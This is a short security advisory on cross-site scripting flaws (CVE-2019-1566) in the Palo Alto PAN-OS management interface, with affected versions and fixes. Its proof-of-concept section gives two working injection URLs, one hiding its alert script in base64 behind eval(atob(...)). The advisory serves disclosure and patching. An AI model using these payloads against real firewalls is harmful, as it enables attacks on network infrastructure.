Palo Alto Firewall Multiple Cross-Site Scripting Vulnerabilities

Vulnerability

Purplemet Lab team discovered multiple cross-site scripting (XSS) vulnerabilities in Palo Alto PAN-OS Management Web Interface (CVE-2019-1566). PAN-OS 7.1.21 and earlier, PAN-OS 8.0.14 and earlier, and PAN-OS 8.1.5 and earlier embed an old version of ExtJS which provides charts.swf and swfupload.swf Flash files vulnerable to a cross-site scripting.

Solution

Update to PAN-OS 7.1.22 or latest version, PAN-OS 8.0.15 or latest version, PAN-OS 8.1.6 or latest version.

Proof of concept

The vulnerability can be triggered using the following URLs:

                            
                                https://ip/js/3rdParty/ext/resources/charts.swf?allowedDomain=\%22})))}catch(e){alert(1337)}//
                            
                        

                            
                                https://ip/js/3rdParty/ext/examples/image-organizer/SWFUpload/Flash/swfupload.swf?movieName=%22])}catch(e){eval(atob(%27YWxlcnQoJ1hTUycp%27))}//
                            
                        

Reference

See Palo Alto Security Advisory PAN-SA-2019-0002.

Purplemet technology detection

Purplemet detects Palo Alto and embedded ExtJS.